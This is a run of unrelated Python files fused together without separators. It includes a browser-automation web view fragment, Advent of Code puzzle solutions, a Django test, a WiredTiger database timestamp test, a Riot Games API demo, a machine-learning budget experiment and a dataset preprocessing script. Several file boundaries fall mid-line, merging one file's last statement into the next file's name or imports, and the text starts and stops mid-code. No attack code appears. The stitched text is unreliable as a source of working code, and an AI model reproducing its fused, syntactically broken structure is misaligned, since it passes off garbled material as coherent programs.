Status(status_code, str(query_value.get("value"))) if query_value.has_key("value"): result.clear() result.update(query_value["value"]) return Status(kOk) time.sleep(0.1) def CallAsyncFunction(self, frame, function, args, timeout, result): return self.CallAsyncFunctionInternal(frame, function, args, False, timeout, result) def CallUserAsyncFunction(self, frame, function, args, timeout, result): return self.CallAsyncFunctionInternal(frame, function, args, True, timeout, result) # return status and is_not_pending def IsNotPendingNavigation(self, frame_id): (status, is_pending) = self.navigation_tracker.IsPendingNavigation(frame_id) if status.IsError(): return (status, True) if is_pending and self.dialog_manager.IsDialogOpen(): return (Status(kUnexpectedAlertOpen), False) is_not_pending = not is_pending return (Status(kOk), is_not_pending) # return status and is_pending def IsPendingNavigation(self, frame_id): return self.navigation_tracker.IsPendingNavigation(frame_id) def WaitForPendingNavigations(self, frame_id, timeout, stop_load_on_timeout): VLOG(0, "Waiting for pending navigations...") status = self.client.HandleEventsUntil(Bind(self.IsNotPendingNavigation, [frame_id]), timeout) if status.Code() == kTimeout and stop_load_on_timeout: VLOG(0, "Timed out. Stopping navigation...") unused_value = {} self.EvaluateScript("", "window.stop();", unused_value) new_status = self.client.HandleEventsUntil(Bind(self.IsNotPendingNavigation, [frame_id]), 10) if new_status.IsError(): status = new_status VLOG(0, "Done waiting for pending navigations") return status def TakeHeapSnapshot(self): return self.heap_snapshot_taker.TakeHeapSnapshot() # return status and out_frame def GetFrameByFunction(self, frame, function, args): (status, context_id) = _GetContextIdForFrame(self.frame_tracker, frame) if status.IsError(): return status found_node = False node_id = -1 (status, found_node, node_id) = _GetNodeIdFromFunction(self.client, context_id, function, args) if status.IsError(): return status if not found_node: return Status(kNoSuchFrame) return self.dom_tracker.GetFrameIdForNode(node_id) def SetFileInputFiles(self, frame, element, files): file_list = [] for i in files: if not i.startswith("/"): return Status(kUnknownError, "path is not absolute: " + i) if i.find(".") != -1: return Status(kUnknownError, "path is not canonical: " + i) file_list.append(i) (status, context_id) = _GetContextIdForFrame(self.frame_tracker, frame) if status.IsError(): return status args = [] args.append(copy.deepcopy(element)) (status, found_node, node_id) = _GetNodeIdFromFunction(self.client, context_id, "function(element) { return element; }", args) if status.IsError(): return status if not found_node: return Status(kUnknownError, "no node ID for file input") params = {} params["nodeId"] = node_id params["files"] = file_list return self.client.SendCommand("DOM.setFileInputFiles", params) # return status and screenshot def CaptureScreenshot(self): result = {} status = self.client.SendCommandAndGetResult("Page.captureScreenshot", {}, result) if status.IsError(): return (status, "") screenshot = result.get("data") if type(screenshot) != str: return (Status(kUnknownError, "expected string 'data' in response"), "") return (Status(kOk), screenshot) """Falcon benchmarks""" from .bench import main # NOQA docker run -it falconry/falcon-bench:pypy3from invoke import task @task def hello(ctx): "Say hello" print('Hello!') from django.contrib.auth import get_user_model from django.urls import reverse from tests.base.mixins import ProductTestUtils from tests.base.tests import ShopUserTestCase UserModel = get_user_model() class ShowBoughtProductsPageTest(ProductTestUtils, ShopUserTestCase): def test_showBoughtProducts(self): self.client.force_login(self.user) response = self.client.get(reverse('bought_products')) self.assertEqual(200, response.status_code) import Advent_of_code2020 as aoc def format_seats(seats): seat_grid = [] for idx, seat_line in enumerate(seats): seat_line = seat_line.replace("\n", "") seat_grid.append([]) for seat in seat_line: seat_grid[idx].append(seat) return seat_grid def get_range(min, maks, pos): offset = 1 if pos <= min : start = pos else: start = pos - offset if pos >= maks : stop = pos else: stop = pos + offset return start, stop def getSeats_Dim(seats): rows = len(seats) cols = len(seats[0]) return rows, cols def copy_seats(seats): seats_rows, seats_cols = getSeats_Dim(seats) new_seats = [["." for i in range(seats_cols)] for j in range(seats_rows)] return new_seats def check_adjecent_seats(seats, pos_x, pos_y): number_of_ocupied_seats = 0 seats_rows, seats_cols = getSeats_Dim(seats) x_start, x_stop = get_range(0,seats_cols, pos_x) y_start, y_stop = get_range(0,seats_rows, pos_y) for x in range(seats_rows): for y in range(seats_cols): if x >= x_start and x <= x_stop: if y >= y_start and y <= y_stop: if x == pos_x and y == pos_y: #print("S", end="") pass else: if seats[x][y] == "#": number_of_ocupied_seats += 1 #print(seats[x][y], end= "") #print() return number_of_ocupied_seats def new_seatLayout(seats): new_seats = copy_seats(seats) seats_changed = False for pos_x,seat_row in enumerate(seats): for pos_y, seat in enumerate(seat_row): number_of_ocupied_seats = check_adjecent_seats(seats,pos_x,pos_y) if seat == "L" and number_of_ocupied_seats == 0: new_seats[pos_x][pos_y] = "#" seats_changed = True elif seat == "#" and number_of_ocupied_seats >= 4: new_seats[pos_x][pos_y] = "L"#str(number_of_ocupied_seats)# seats_changed = True else: new_seats[pos_x][pos_y] = seat #print("=", pos_x,pos_y, seat, new_seats[pos_x][pos_y], number_of_ocupied_seats) return new_seats, seats_changed def print_seats(seats): str = "" for seat_row in seats: print(str.join(seat_row)) print() def count_seats(seats): count = 0 for seat_row in seats: for seat in seat_row: if seat == "#": count+=1 return count def solve(): seats = aoc.importFile("11122020.txt") seat_grid = format_seats(seats) iteration = 0 while(True): iteration += 1 #print_seats(seat_grid) new_seat_grid,seat_changed = new_seatLayout(seat_grid) if seat_changed: seat_grid = new_seat_grid else: break print(iteration) print(count_seats(new_seat_grid)) if __name__ == "__main__": solve()from setuptools import setup, find_packages install_requires = [ "matplotlib", "PyYAML", "beautifulsoup4", "lxml", "click", "mako", "xlsxwriter", "openpyxl", ] dev_requires = [ "pytest", "pytest-cov", "sphinx", ] setup( name="tutor-planner", version="1.0", packages=find_packages(), include_package_data=True, install_requires=install_requires, extras_require={ "dev": dev_requires, }, entry_points={ "console_scripts": [ "tutor-planner = tutorplanner.__main__:cli", ], }, ) 00-hello.py print '\nHello, World!' myName = raw_input('What is your name? ') print 'It is nice to meet you, ' + myName + '\n' NCBI-Hackathons/PlantContam1-10 import sys import random # Substitute a given nucleotide with another # Parameters: bp (string) # Output: new basepair (string) def replace_basepair(bp): nucleotides = ['A', 'T', 'C', 'G'] if bp in nucleotides: nucleotides.remove(bp) return nucleotides[random.randint(0, 2)] else: return bp # Randomly switch nucleotides in a sequence with stated frequency # Parameters: sequence (string), swapFreq (int) # Output: new sequence (string) def insert_swaps(sequence, swapFreq): sequence = sequence.upper() swaps = int(len(sequence)*swapFreq) indices = random.sample(range(0, len(sequence) - 1), swaps) for i in indices: nucleotides = list(sequence) nucleotides[i] = replace_basepair(nucleotides[i]) sequence = ''.join(nucleotides) return sequence #!/usr/bin/python3 import copy from os import device_encoding from typing import DefaultDict, List import sys from collections import defaultdict import heapq lines = open(sys.argv[1] if len(sys.argv) > 1 else "day18.dat", "r").read().splitlines() gcounter = 0 def recount(vals, firstcall = True): global gcounter ret = [] if firstcall == True: gcounter = 0 for v in vals: if type(v) == list: ret.append(recount(v, False)) else: v2 = (v[0], gcounter) ret.append(v2) gcounter += 1 return ret def processLine(line, firstcall = True): val = [] offset = -1 for i, v in enumerate(line): if offset < 0: tmp = [] if v in ["[", "]", ","]: if v in ["["]: offset, V = processLine(line[i+1:], False) val.append(V) if v in ["]"]: #print("Return", i, val) return i+1, val else: val.append((int(v), 0)) else: offset -= 1 if offset == 0: offset = -1 if firstcall == True: val = recount(val) return val return i, val exploded = None level = 0 def findExploded(L, firstcall = True): global level, exploded ret = [] if firstcall: exploded = None level = -1 level += 1 if level == 4 and exploded == None: if type(L[0]) == list: exploded = L[0] ret.append((0, None)) ret.append(L[1]) elif type(L[1]) == list: exploded = L[1] ret.append(L[0]) ret.append((0, None)) else: ret = L else: for l in L: if type(l) == list: v = findExploded(l, False) ret.append(v) else: ret.append(l) level -= 1 return ret replaced = None def replaceAfter(L, v): ret = [] for l in L: if type(l) == list: v2 = replaceAfter(l, v) ret.append(v2) else: if l[1] == v[1] + 1: ret.append((l[0]+v[0], None)) else: ret.append(l) return ret lastFound = 10e9 def findPosBefore(L, v): global lastFound for l in L: if type(l) == list: findPosBefore(l, v) else: print("foo", l, v) if l[1] != None: if l[1] < v[1]: if lastFound == None: lastFound = l[1] elif l[1] > lastFound: lastFound = l[1] return def addingBefore(L, pos, v): ret = [] for l in L: if type(l) == list: ret.append(addingBefore(l, pos, v)) else: if l[1] == pos: ret.append((l[0]+v,l[1])) else: ret.append(l) return ret def replaceBefore(L, v): global lastFound #lastFound = None #findPosBefore(L, v) #if lastFound != None: #print("assert1", L) #print("assert2", v[1], v[0]) L = addingBefore(L, v[1]-1, v[0]) return L def uncount(L): ret = [] for l in L: if type(l) == list: ret.append(uncount(l)) else: ret.append(l[0]) return ret def tostring(L): ret = "[" for i,l in enumerate(L): if i == 1: ret += "," if type(l) == list: ret += tostring(l) else: if type(l) == tuple: ret += str(l[0]) else: ret += str(l) ret += "]" return ret def process(line): L = processLine(line) #print("0", uncount(L)) L = findExploded(L) #print("1", uncount(L)) L = replaceBefore(L, exploded[0]) #print("2", uncount(L)) L = replaceAfter(L, exploded[1]) L = recount(L) L = uncount(L) L = tostring(L[0]) #print("Result", L) return L alreadysplit = False def splitme(L, firstcall = True): global alreadysplit if firstcall: alreadysplit = False ret = [] for l in L: if type(l) == list: ret.append(splitme(l, False)) else: if alreadysplit == False: if l[0] >= 10: alreadysplit = True tmp = [] tmp.append((l[0]//2, None)) tmp.append(((l[0]+1)//2, None)) ret.append(tmp) else: ret.append(l) else: ret.append(l) return ret def split(line): L = processLine(line) print("1", tostring(L[0])) L = splitme(L) L = recount(L) print("2", tostring(L[0])) L = tostring(L[0]) return L def reduceme(line): global exploded L = processLine(line) #print("Reducing......", tostring(L[0])) L2 = None while L2 != tostring(L[0]): L2 = tostring(L[0]) #print("0", uncount(L)) explodeagain = True while explodeagain: explodeagain = False beExp = tostring(L[0]) L = findExploded(L) if exploded != None: #print("Before Explode", beExp, "explode", exploded[0][0], exploded[1][0]) explodeagain = True #print("1", uncount(L)) L = replaceBefore(L, exploded[0]) #print("2", uncount(L)) L = replaceAfter(L, exploded[1]) L = recount(L) #print("After Explode", tostring(L[0])) L = splitme(L) L = recount(L) L = uncount(L) L = tostring(L[0]) #print("Result", L) return L assert(process("[[[[[9,8],1],2],3],4]") == "[[[[0,9],2],3],4]") assert(process("[7,[6,[5,[4,[3,2]]]]]") == "[7,[6,[5,[7,0]]]]") assert(process("[[6,[5,[4,[3,2]]]],1]") == "[[6,[5,[7,0]]],3]") assert(process("[[3,[2,[1,[7,3]]]],[6,[5,[4,[3,2]]]]]") == "[[3,[2,[8,0]]],[9,[5,[4,[3,2]]]]]") assert(process("[[3,[2,[8,0]]],[9,[5,[4,[3,2]]]]]") == "[[3,[2,[8,0]]],[9,[5,[7,0]]]]") assert(reduceme("[[[[[4,3],4],4],[7,[[8,4],9]]],[1,1]]") == "[[[[0,7],4],[[7,8],[6,0]]],[8,1]]") def processMultilines(lines): S = None for l in lines: if S == None: S = l S = reduceme(S) else: l = reduceme(l) S = "[" + S + "," + l + "]" S = reduceme(S) return S def calcMag(L): ret = 0 if type(L[0]) == list: ret += 3 * calcMag(L[0]) else: ret += 3 * L[0][0] if type(L[1]) == list: ret += 2 * calcMag(L[1]) else: ret += 2 * L[1][0] return ret def magnitude(line): L = processLine(line) return calcMag(L[0]) assert(processMultilines(["[1,1]", "[2,2]", "[3,3]", "[4,4]"]) == "[[[[1,1],[2,2]],[3,3]],[4,4]]") assert(processMultilines(["[1,1]", "[2,2]", "[3,3]", "[4,4]", "[5,5]"]) == "[[[[3,0],[5,3]],[4,4]],[5,5]]") assert(processMultilines(["[1,1]", "[2,2]", "[3,3]", "[4,4]", "[5,5]", "[6,6]"]) == "[[[[5,0],[7,4]],[5,5]],[6,6]]") #assert(processMultilines(["[[[0,[4,5]],[0,0]],[[[4,5],[2,6]],[9,5]]]", "[7,[[[3,7],[4,3]],[[6,3],[8,8]]]]"]) == "[[[[4,0],[5,4]],[[7,7],[6,0]]],[[8,[7,7]],[[7,9],[5,0]]]]") assert(magnitude("[[1,2],[[3,4],5]]") == 143) assert(magnitude("[[[[8,7],[7,7]],[[8,6],[7,7]]],[[[0,7],[6,6]],[8,7]]]") == 3488) res = processMultilines(lines) print("Part1", magnitude(res)) p2 = -1000 for i in range(len(lines)): for j in range(len(lines)): if i != j: res = processMultilines((lines[i], lines[j])) p2 = max(p2, magnitude(res)) print("Part2", p2)import pygame # initialize Pygame pygame.init() # Class Button # Creates a Button object class Button(pygame.sprite.Sprite): def __init__(self, screen, x, y, w, h, text): pygame.sprite.Sprite.__init__(self) self.image = pygame.Surface((w, h)) self.image.fill((0, 0, 0)) font = pygame.font.Font(None, 36) buttonText = font.render(text, 1, ((255, 255, 255))) self.image.blit(buttonText, (0, 0)) self.rect = self.image.get_rect() self.rect.x = x self.rect.y = y self.screen = screensqlite.py0 import sqlite3 print(sqlite3.version) print(sqlite3.sqlite_version) conn = sqlite3.connect("test.db", isolation_level=None) # db 생성(Auto Commit) c = conn.cursor() # 커서 command = "" while command != "exit": command = input(">>") try : c.execute(command) except : print("명령어 실행 오류") print(c.fetchall()) conn.close() #!/usr/bin/env python # # Public Domain 2014-present MongoDB, Inc. # Public Domain 2008-2014 WiredTiger, Inc. # # This is free and unencumbered software released into the public domain. # # Anyone is free to copy, modify, publish, use, compile, sell, or # distribute this software, either in source code form or as a compiled # binary, for any purpose, commercial or non-commercial, and by any # means. # # In jurisdictions that recognize copyright laws, the author or authors # of this software dedicate any and all copyright interest in the # software to the public domain. We make this dedication for the benefit # of the public at large and to the detriment of our heirs and # successors. We intend this dedication to be an overt act of # relinquishment in perpetuity of all present and future rights to this # software under copyright law. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR # OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, # ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR # OTHER DEALINGS IN THE SOFTWARE. # # test_timestamp08.py # Timestamps: API # from suite_subprocess import suite_subprocess import wiredtiger, wttest class test_timestamp08(wttest.WiredTigerTestCase, suite_subprocess): tablename = 'test_timestamp08' uri = 'table:' + tablename def test_timestamp_api(self): self.session.create(self.uri, 'key_format=i,value_format=i') c = self.session.open_cursor(self.uri) # Begin by adding some data. self.session.begin_transaction() c[1] = 1 self.session.commit_transaction( 'commit_timestamp=' + self.timestamp_str(1)) # Cannot set a zero timestamp. self.session.begin_transaction() self.assertRaisesWithMessage(wiredtiger.WiredTigerError, lambda: self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 0), '/zero not permitted/') self.assertRaisesWithMessage(wiredtiger.WiredTigerError, lambda: self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_READ, 0), '/zero not permitted/') self.session.rollback_transaction() # In a single transaction it is illegal to set a commit timestamp # older than the first commit timestamp used for this transaction. # Check both timestamp_transaction_uint and commit_transaction APIs. self.session.begin_transaction() self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 3) c[3] = 3 self.assertRaisesWithMessage(wiredtiger.WiredTigerError, lambda: self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 2), '/older than the first commit timestamp/') self.session.rollback_transaction() # Commit timestamp > Oldest timestamp self.conn.set_timestamp('oldest_timestamp=' + self.timestamp_str(3)) self.session.begin_transaction() self.assertRaisesWithMessage(wiredtiger.WiredTigerError, lambda: self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 2), '/less than the oldest timestamp/') self.session.rollback_transaction() self.session.begin_transaction() c[4] = 4 self.session.commit_transaction( 'commit_timestamp=' + self.timestamp_str(4)) # Commit timestamp > Stable timestamp. # Check both timestamp_transaction and commit_transaction APIs. # Oldest and stable timestamp are set to 5 at the moment. self.conn.set_timestamp('stable_timestamp=' + self.timestamp_str(6)) self.session.begin_transaction() self.assertRaisesWithMessage(wiredtiger.WiredTigerError, lambda: self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 5), '/after the stable timestamp/') self.session.rollback_transaction() # When explicitly set, commit timestamp for a transaction can be earlier # than the commit timestamp of an earlier transaction. self.session.begin_transaction() c[6] = 6 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 7) self.session.commit_transaction() self.session.begin_transaction() c[8] = 8 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 8) self.session.commit_transaction() self.session.begin_transaction() c[7] = 7 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 7) self.session.commit_transaction() # Read timestamp >= oldest timestamp self.conn.set_timestamp('oldest_timestamp=' + self.timestamp_str(7) + ',stable_timestamp=' + self.timestamp_str(7)) if wiredtiger.standalone_build(): self.assertRaisesException(wiredtiger.WiredTigerError, lambda: self.session.begin_transaction('read_timestamp=' + self.timestamp_str(6))) else: # This is a MongoDB message, not written in standalone builds. with self.expectedStdoutPattern('less than the oldest timestamp'): self.assertRaisesException(wiredtiger.WiredTigerError, lambda: self.session.begin_transaction('read_timestamp=' + self.timestamp_str(6))) # c[8] is not visible at read_timestamp < 8 self.session.begin_transaction() self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_READ, 7) self.assertEqual(c[6], 6) self.assertEqual(c[7], 7) c.set_key(8) self.assertEqual(c.search(), wiredtiger.WT_NOTFOUND) self.session.commit_transaction() self.session.begin_transaction() self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_READ, 8) self.assertEqual(c[6], 6) self.assertEqual(c[7], 7) self.assertEqual(c[8], 8) self.assertTimestampsEqual( self.conn.query_timestamp('get=oldest_reader'), self.timestamp_str(8)) self.session.commit_transaction() # We can move the oldest timestamp backwards with "force" self.conn.set_timestamp('oldest_timestamp=' + self.timestamp_str(5) + ',force') if wiredtiger.standalone_build(): self.session.begin_transaction() self.assertRaisesException(wiredtiger.WiredTigerError, lambda: self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_READ, 4)) else: # This is a MongoDB message, not written in standalone builds. self.session.begin_transaction() with self.expectedStdoutPattern('less than the oldest timestamp'): self.assertRaisesException(wiredtiger.WiredTigerError, lambda: self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_READ, 4)) self.session.rollback_transaction() self.session.begin_transaction() self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_READ, 6) self.assertTimestampsEqual( self.conn.query_timestamp('get=oldest_reader'), self.timestamp_str(6)) self.session.commit_transaction() def test_all_durable(self): self.session.create(self.uri, 'key_format=i,value_format=i') cur1 = self.session.open_cursor(self.uri) # Since this is a non-prepared transaction, we'll be using the commit # timestamp when calculating all_durable since it's implied that they're # the same thing. self.session.begin_transaction() cur1[1] = 1 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 3) self.session.commit_transaction() self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '3') # We have a running transaction with a lower commit_timestamp than we've # seen before. So all_durable should return (lowest commit timestamp - 1). self.session.begin_transaction() cur1[2] = 2 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 2) self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '1') self.session.commit_transaction() # After committing, go back to the value we saw previously. self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '3') # For prepared transactions, we take into account the durable timestamp # when calculating all_durable. self.session.begin_transaction() cur1[3] = 3 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_PREPARE, 6) self.session.prepare_transaction() # If we have a commit timestamp for a prepared transaction, then we # don't want that to be visible in the all_durable calculation. self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 7) self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '3') # Now take into account the durable timestamp. self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_DURABLE, 8) self.session.commit_transaction() self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '8') # All durable moves back when we have a running prepared transaction # with a lower durable timestamp than has previously been committed. self.session.begin_transaction() cur1[4] = 4 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_PREPARE, 3) self.session.prepare_transaction() # If we have a commit timestamp for a prepared transaction, then we # don't want that to be visible in the all_durable calculation. self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 4) self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '8') # Now take into account the durable timestamp. self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_DURABLE, 5) self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '4') self.session.commit_transaction() self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '8') # Now test a scenario with multiple commit timestamps for a single txn. self.session.begin_transaction() cur1[5] = 5 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 6) self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '5') # Make more changes and set a new commit timestamp. # Our calculation should use the first commit timestamp so there should # be no observable difference to the all_durable value. cur1[6] = 6 self.session.timestamp_transaction_uint(wiredtiger.WT_TS_TXN_TYPE_COMMIT, 7) self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '5') # Once committed, we go back to 8. self.session.commit_transaction() self.assertTimestampsEqual( self.conn.query_timestamp('get=all_durable'), '8') if __name__ == '__main__': wttest.run() 0 import requests import json """ This is a very simple wrapper script for Riot Games' API. Here I will demonstrate how to gather a specific match information for a specific user. If you'd like to run this yourself, just make sure to pip install requests and create an account with Riot Games, it's a quick process. Their API client can be found here https://developer.riotgames.com/ """ API_KEY = "" # Going to use my friend's account for the data summoner_name = "TinyKittens" # Yeah their in game name is TinyKittens :) # We use the following endpoint with an API key # to get the summoner's data, more specifically # Their PUUID which is used to query for their # match history summoner_url = f"https://na1.api.riotgames.com/lol/summoner/v4/summoners/by-name/{summoner_name}?api_key={API_KEY}" summoner_response = requests.get(summoner_url) summoner_data = summoner_response.json() # The reponse is returned in json format, # from which I can extract a "puuid" to then # find the summoner's match list summoner_puuid = summoner_data["puuid"] # For simplicity's sake we'll only retrieve # one of their matches. match_list_url = f"https://americas.api.riotgames.com/lol/match/v5/matches/by-puuid/{summoner_puuid}/ids?start=0&count=1&api_key={API_KEY}" match_list_response = requests.get(match_list_url) match_list_data = match_list_response.json() match_id = match_list_data[0] # Now that we have a match_id, let's see # what kind of data we can obtain from it! match_timeline_url = f"https://americas.api.riotgames.com/lol/match/v5/matches/{match_id}/timeline?api_key={API_KEY}" match_timeline_reponse = requests.get(match_timeline_url) match_timeline = match_timeline_reponse.json() # Okay we have an entire json full of details # from the match. Let's see what's in it print(match_timeline.keys()) # dict_keys(['metadata', 'info']) # Okay so we have the json's metadata and info. # Let's see what we can find in the info tab match_info = match_timeline["info"] print(match_info.keys()) match_frames = match_info["frames"] print(len(match_frames)) for frame in match_frames: print(frame.keys()) # It seems that the match information is broken down # into frames. We have 17 of these intervals. Let's # now see what an interval looks like. I will output the # info from this interval into a .json file, since I now # it's a lot of data. frame = match_frames[7] frame_1 = frame['participantFrames'] event_list1 = frame['events'] with open("frame_interval.json", "w") as file: json.dump(frame_1, file) # If we now look at the file frame_interval.json, we can # see all the data that just 1 frame out of the 17 looks # like. We can also obtain ALL sorts of data from this, # including even a player position on the map! Using Datadog # we could certainly gather this data from millions of matches # and be able to monitor for statistical anomalies for all of # the hundreds of champions, items, and spells in the game. with open("event_interval.json", "w") as file: json.dump(event_list1, file) # We could also model the likelyhood of a victory or loss # by analyzing specific, but important, events that happen # in a match. For example a team is able to capture X objective # at Y timestamp, suddenly their odds of winning might increase # by 15%. Even further, it could also recommend courses of # action for the team based on historical data from these # matches. The possibilities are endless.from sklearn.ensemble import RandomForestRegressor from sklearn.datasets import make_regression import numpy as np import torch from budget import optimize_budget_multilinear, BudgetInstanceMultilinear, dgrad_budget import pickle from functools import partial from optmodel import ContinuousOptimizer #from multilinear_budget import dgrad_dparams import torch.nn as nn import random #max_depth = 50 num_iters = 30 opt_vals = {} kvals = [5, 10, 15, 20, 25, 30] #kvals = [30] #kval #algname = 'dt_{}'.format(max_depth) algname = 'dt_100' opt_vals[algname] = np.zeros((num_iters, len(kvals))) mse_vals = {} mse_vals[algname] = np.zeros((num_iters)) for idx in range(num_iters): def load_instance(n, i, num_targets): with open('new_budget_instances/yahoo_' + str(n) + '_' + str(i), 'rb') as f: Pfull, wfull = pickle.load(f, encoding='bytes') P = np.zeros((num_items, num_targets), dtype=np.float32) for i in range(num_targets): for j in Pfull[i]: P[j, i] = Pfull[i][j] P = torch.from_numpy(P).float() return P num_items = 100 num_targets = 500 num_iters = 40 test_pct = 0.2 num_instances = 500 total_instances = 500 instances_load = random.sample(range(total_instances), num_instances) Ps = [load_instance(num_items, i, num_targets) for i in instances_load] test = random.sample(range(num_instances), int(test_pct*num_instances)) train = [i for i in range(num_instances) if i not in test] w = np.ones(num_targets, dtype=np.float32) true_transform = nn.Sequential( nn.Linear(num_targets, num_targets), nn.ReLU(), nn.Linear(num_targets, num_targets), nn.ReLU(), nn.Linear(num_targets, num_targets), nn.ReLU(), ) data = [torch.from_numpy(true_transform(P).detach().numpy()).float() for P in Ps] loss_fn = nn.MSELoss() def get_test_mse(net): loss = 0 for i in test: pred = net(data[i]) loss += loss_fn(pred, Ps[i]) return loss/len(test) def get_train_mse(net): loss = 0 for i in train: pred = net(data[i]) loss += loss_fn(pred, Ps[i]) return loss/len(train) Xs = [] Ys = [] for i in train: Xs.append(data[i].detach().numpy()) Ys.append(Ps[i].detach().numpy()) X = np.vstack(Xs) Y = np.vstack(Ys) regr = RandomForestRegressor(n_estimators=100, n_jobs=36) pickle.dump([1,2,3], open('test.pickle', 'wb')) print('start fitting') regr.fit(X, Y) # pickle.dump(regr, open('networks/synthetic_dt_100_{}.pickle'.format(idx), 'wb')) def net_two_stage(data_instance): y = regr.predict(data_instance.detach().numpy()) return torch.from_numpy(y).float() mse_vals[algname][idx] = get_test_mse(net_two_stage) for kidx, k in enumerate(kvals): optfunc = partial(optimize_budget_multilinear, w = w, k=k, c = 0.95) #dgrad = partial(dgrad_dparams, w=w) dgrad = partial(dgrad_budget, w = w) opt = ContinuousOptimizer(optfunc, dgrad, None, 0.95) opt.verbose = False f_true = [BudgetInstanceMultilinear(P, w, True) for P in Ps] def eval_opt(net, instances): val = 0. for i in instances: pred = net(data[i]) x = opt(pred) val += f_true[i](x) return val/len(instances) opt_vals[algname][idx, kidx] = eval_opt(net_two_stage, test).item() print(idx, mse_vals[algname][idx], opt_vals[algname][idx, kidx]) pickle.dump((opt_vals, mse_vals), open('evaluation_budget_synthetic_{}.pickle'.format(algname), 'wb')) CDboyOne/IHGNN from typing import Type, Any, List, Dict, Set, Tuple, Union, Optional, Iterator, Iterable import os, sys, random, argparse sys.dont_write_bytecode = True sys.path.append('.') os.umask(0) from Helpers.PreProcessHelper import PreProcessHelper from Helpers.IOHelper import IOHelper from Helpers.SearchLog import RawSearchLog from Helpers.SearchLogCollection import RawSearchLogCollection # 决定是否生成针对 item 的 N-core 数据集。含义:从数据集中删去交互次数少于 N 的 item process_item_N_core = True # 以下两个选项不能全为 True # 决定是否生成针对 user 的 N-core 数据集。含义:从数据集中删去交互次数少于 N 的 user process_user_N_core = True # 决定是否从所有 user 中随机选取 N_sample_user 个 process_user_random_sample = False N_core_item = 5 N_core_user = 5 N_sample_user = 2_0000 source_folder = 'E:/DataScienceDataset/AlibabaAir/Intermediate/Complete5Core/' result_folder = 'E:/DataScienceDataset/AlibabaAir/Intermediate/Subset02W5Core/' source_folder = 'E:/DataScienceDataset/Cikm/Intermediate/WithCategory/' result_folder = 'E:/DataScienceDataset/Cikm/Intermediate/WithCategory5Core/' args = argparse.ArgumentParser() args.add_argument('--source', default='', type=str, help='源数据目录') args.add_argument('--result', default='', type=str, help='存储结果的目录') args.add_argument('--nitem', default=0, type=int) args.add_argument('--nuser', default=0, type=int) args.add_argument('--rand_user', default=0, type=int) args = args.parse_args() source_folder = args.source or source_folder result_folder = args.result or result_folder if args.nitem: process_item_N_core = True N_core_item = args.nitem if args.nuser: process_user_N_core = True process_user_random_sample = False N_core_user = args.nuser elif args.rand_user: process_user_random_sample = True process_user_N_core = False N_sample_user = args.rand_user else: if args.nitem: process_user_random_sample = False process_user_N_core = False assert(source_folder != result_folder) IOHelper.StartLogging(os.path.join(result_folder, 'PreProcess-Step2.txt')) if not os.path.exists(result_folder): os.makedirs(result_folder) # ------------------------- IOHelper.LogPrint() item_ids = [] item_title_segments = [] vocabulary_item = set() IOHelper.LogPrint('已有处理好的 item 数据,正在读取...') item_ids: List[str] = IOHelper.ReadStringListFromFile(os.path.join(source_folder, 'item_ids.txt')) item_title_segments: List[str] = IOHelper.ReadStringListFromFile(os.path.join(source_folder, 'item_title_segments.txt')) vocabulary_item: Set[str] = set(IOHelper.ReadStringListFromFile(os.path.join(source_folder, 'vocabulary_item.txt'))) IOHelper.LogPrint(f'完成,共 {len(item_ids)} 个 item。') # ------------------------- IOHelper.LogPrint() search_logs = RawSearchLogCollection() user_ids = [] queries = [] query_segments = [] vocabulary_query = set() IOHelper.LogPrint('已有处理好的 search 数据,正在读取...') user_ids: List[str] = IOHelper.ReadStringListFromFile(os.path.join(source_folder, 'user_ids.txt')) queries: List[str] = IOHelper.ReadStringListFromFile(os.path.join(source_folder, 'queries.txt')) query_segments: List[str] = 